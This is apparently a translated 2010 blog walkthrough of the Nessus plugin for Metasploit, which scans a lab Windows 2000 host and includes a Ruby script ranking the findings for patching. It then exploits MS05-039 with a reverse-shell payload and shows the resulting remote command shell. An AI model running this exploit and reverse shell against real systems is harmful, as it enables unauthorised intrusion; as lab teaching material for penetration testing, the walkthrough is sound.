
Playing with the Nessus plugin for Metasploit

Recently the developer Zate Berg released a Nessus plug-in for the Metasploit Framework; it is available in the development version of MSF.

For the tests I used the following scenario:

* Debian host with Nessus and Metasploit
* Target host running Windows 2000, "bug-ridden to its very soul"

First I updated MSF and Nessus, then moved on to the fun part:

cd /tmp/pentest_tools/trunk

svn update

/opt/nessus/sbin/nessus-update-plugins

/opt/nessus/sbin/nessus-service &

./msfconsole


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r10505 updated today (2010.09.28)

msf>

Fun 🙂

Loading the Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Connecting...

msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
***********
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listing the existing Nessus policies

msf> nessus_policy_list

[+] Nessus Policy List

| ID | Name   | Owner  | visability |
|----|--------|--------|------------|
| 1  | attack | alexos | private    |

Starting the scan

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Once the scan has finished, it is time to check the report

msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

| Port | Protocol | Severity | Service Name | Sev 0 | Sev 1 | Sev 2 | Sev 3 |
|------|----------|----------|--------------|-------|-------|-------|-------|
| 0    | icmp     | 1        | general      | 0     | 2     | 0     | 0     |
| 0    | tcp      | 3        | general      | 0     | 9     | 0     | 1     |
| 0    | udp      | 1        | general      | 0     | 1     | 0     | 0     |
| 21   | tcp      | 3        | ftp          | 1     | 4     | 2     | 2     |
| 135  | tcp      | 3        | epmap        | 1     | 1     | 0     | 1     |
| 135  | udp      | 3        | epmap?       | 0     | 0     | 0     | 1     |
| 137  | udp      | 1        | netbios-ns   | 0     | 1     | 0     | 0     |
| 139  | tcp      | 1        | smb          | 1     | 1     | 0     | 0     |
| 445  | tcp      | 3        | cifs         | 1     | 10    | 2     | 12    |
| 1025 | tcp      | 3        | dce-rpc      | 1     | 1     | 0     | 1     |
| 1028 | udp      | 1        | dce-rpc      | 0     | 1     | 0     | 0     |
| 5800 | tcp      | 1        | www          | 1     | 4     | 0     | 0     |
| 5801 | tcp      | 1        | www          | 1     | 3     | 0     | 0     |
| 5900 | tcp      | 3        | vnc          | 1     | 2     | 0     | 1     |
| 5901 | tcp      | 1        | vnc          | 1     | 3     | 0     | 0     |

Getting information about the vulnerabilities present on the target's port 445 (smb)

msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

| Port | Severity | PluginID | Plugin Name | CVSS2 | Exploit? | CVE | Risk Factor | CVSS Vector |
|------|----------|----------|-------------|-------|----------|-----|-------------|-------------|
| cifs (445/tcp) | 1 | 10736 | DCE Services Enumeration | none | . | . | None | . |
| cifs (445/tcp) | 1 | 10785 | SMB NativeLanManager Remote System Information Disclosure | none | . | . | None | . |
| cifs (445/tcp) | 1 | 10394 | SMB Log In Possible | none | false | CVE-1999-0504 | None | . |
| cifs (445/tcp) | 1 | 11011 | SMB Service Detection | none | . | . | None | . |
| cifs (445/tcp) | 1 | 10395 | SMB Shares Enumeration | none | . | . | None | . |
| cifs (445/tcp) | 1 | 26920 | Windows SMB NULL Session Authentication | none | false | CVE-1999-0519 | None | . |
| cifs (445/tcp) | 1 | 17651 | Obtains the password policy | none | . | . | None | . |
| cifs (445/tcp) | 3 | 22034 | MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) | 7.5 | true | CVE-2006-1314 | High | CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P |
| cifs (445/tcp) | 3 | 19407 | MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) | 10.0 | true | CVE-2005-1984 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 12209 | MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) | 10.0 | true | CVE-2003-0533 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 12054 | MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) | 10.0 | true | CVE-2003-0818 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 1 | 10859 | SMB LsaQueryInformationPolicy Function SID Enumeration | none | true | CVE-2000-1200 | None | . |
| cifs (445/tcp) | 3 | 22194 | MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) | 10.0 | true | CVE-2006-3439 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 19408 | MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) | 10.0 | true | CVE-2005-1983 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 21193 | MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) | 10.0 | false | CVE-2005-2120 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 2 | 18602 | SMB svcctl MSRPC Interface SCM Service Enumeration | 5.0 | false | CVE-2005-2150 | Medium | CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N |
| cifs (445/tcp) | 2 | 18585 | SMB Service Enumeration via srvsvc | 5.0 | false | CVE-2005-2150 | Medium | CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N |
| cifs (445/tcp) | 3 | 35362 | MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) | 10.0 | . | CVE-2008-4834 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 1 | 26917 | SMB Registry : Nessus Cannot Access the Windows Registry | none | . | . | None | . |
| cifs (445/tcp) | 3 | 18502 | MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) | 10.0 | false | CVE-2005-1206 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 11835 | MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) | 10.0 | true | CVE-2003-0715 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 1 | 10860 | SMB Use Host SID to Enumerate Local Users | none | true | CVE-2000-1200 | None | . |
| cifs (445/tcp) | 3 | 11808 | MS03-026: Microsoft RPC Interface Buffer Overrun (823980) | 10.0 | true | CVE-2003-0352 | Critical | CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C |
| cifs (445/tcp) | 3 | 11110 | MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) | 7.5 | true | CVE-2002-0724 | High | CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P |
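A report like the one above is only useful to the people who have to patch the box if it is turned into a priority list. The Ruby below is an added example, not part of this post or of the Nessus bridge plugin: it parses rows in the plain-text layout that nessus_report_host_detail prints (nine columns, with the plugin name as the only column containing spaces, which is an assumption taken from the output above), extracts the Microsoft bulletin number, CVSS2 score and vector and the Exploit? flag, and orders findings worst Risk Factor first, known public exploit first. The sample rows are a constructed subset of the report on this page.

```ruby
# Added example (not part of the post or of the Nessus bridge plugin): turn the
# plain-text rows printed by nessus_report_host_detail into a patch-priority list.
# Assumed nine-column row layout, taken from the report above:
#   Port Severity PluginID "Plugin Name" CVSS2 Exploit? CVE "Risk Factor" "CVSS Vector"

# Constructed sample input: a subset of the rows from the report on this page.
SAMPLE_ROWS = <<~ROWS
  cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
  cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
  cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp) 2 18585 SMB Service Enumeration via srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
ROWS

# One report row. The plugin name is the only column with spaces, so the fixed-format
# columns are matched from both ends and the name (lazily) takes whatever is left.
ROW_RE = /\A
  (?<port>\S+\s\(\d+\/(?:tcp|udp)\))\s+
  (?<severity>\d)\s+
  (?<plugin_id>\d+)\s+
  (?<name>.+?)\s+
  (?<cvss2>none|\d+(?:\.\d+)?)\s+
  (?<exploit>true|false|\.)\s+
  (?<cve>CVE-\d{4}-\d+|\.)\s+
  (?<risk>None|Low|Medium|High|Critical)\s+
  (?<vector>\S+)
\z/x

RISK_RANK = { 'Critical' => 4, 'High' => 3, 'Medium' => 2, 'Low' => 1, 'None' => 0 }.freeze

# "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C" -> {"AV"=>"N", "AC"=>"L", "Au"=>"N", ...}
def parse_vector(token)
  token.sub(/\ACVSS2#/, '').split('/').map { |kv| kv.split(':', 2) }.to_h
end

# Returns a hash for one row, or nil for lines that are not rows (headers, rules).
def parse_row(line)
  m = ROW_RE.match(line.strip)
  return nil unless m
  {
    port: m[:port],
    severity: m[:severity].to_i,
    plugin_id: m[:plugin_id].to_i,
    name: m[:name],
    bulletin: m[:name][/\AMS\d{2}-\d{3}/],                      # nil unless an MSxx-xxx check
    cvss2: m[:cvss2] == 'none' ? nil : m[:cvss2].to_f,
    exploit: { 'true' => true, 'false' => false }[m[:exploit]], # nil when Nessus printed "."
    cve: m[:cve] == '.' ? nil : m[:cve],
    risk: m[:risk],
    vector: m[:vector] == '.' ? nil : parse_vector(m[:vector])
  }
end

def parse_report(text)
  text.each_line.map { |line| parse_row(line) }.compact
end

# Patch-priority order: worst Risk Factor first, findings with a known public exploit
# before those without (unknown counts as "no"), then CVSS2 base score, with PluginID
# as a deterministic tie-breaker. Informational (Risk Factor None) rows are dropped.
def prioritize(findings)
  findings.reject { |f| f[:risk] == 'None' }
          .sort_by { |f| [-RISK_RANK[f[:risk]], f[:exploit] ? 0 : 1, -(f[:cvss2] || 0.0), f[:plugin_id]] }
end

# Microsoft bulletins the host is missing -> worst Risk Factor reported for each.
def missing_bulletins(findings)
  findings.select { |f| f[:bulletin] }
          .group_by { |f| f[:bulletin] }
          .transform_values { |fs| fs.map { |f| f[:risk] }.max_by { |r| RISK_RANK[r] } }
          .sort.to_h
end

# True when the CVSS2 vector says the issue is network-reachable without credentials.
def remote_unauthenticated?(finding)
  v = finding[:vector]
  !v.nil? && v['AV'] == 'N' && v['Au'] == 'N'
end

if $PROGRAM_NAME == __FILE__
  findings = parse_report(SAMPLE_ROWS)
  puts "Missing bulletins: #{missing_bulletins(findings).map { |b, r| "#{b} (#{r})" }.join(', ')}"
  prioritize(findings).each do |f|
    printf("%-8s %-8s cvss=%-4s exploit=%-5s %-14s %s\n",
           f[:bulletin] || '-', f[:risk], f[:cvss2], f[:exploit].inspect, f[:cve] || '-', f[:name][0, 60])
  end
end
```

Run it as a script to get the bulletin list and the ranked findings; to triage a real report, pipe the console output into `parse_report` instead of `SAMPLE_ROWS`. The ranking deliberately treats a missing Exploit? value (the "." Nessus prints, as on the MS09-001 row) the same as "false", so an unknown never outranks a confirmed public exploit; the missing-bulletin list is the artefact that goes to whoever owns the host.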

Using MSF I exploited MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[browser] ...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[browser] ...
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

MSF add-ons like these are always welcome; another interesting integration is Metasploit with Ettercap for MITM testing.
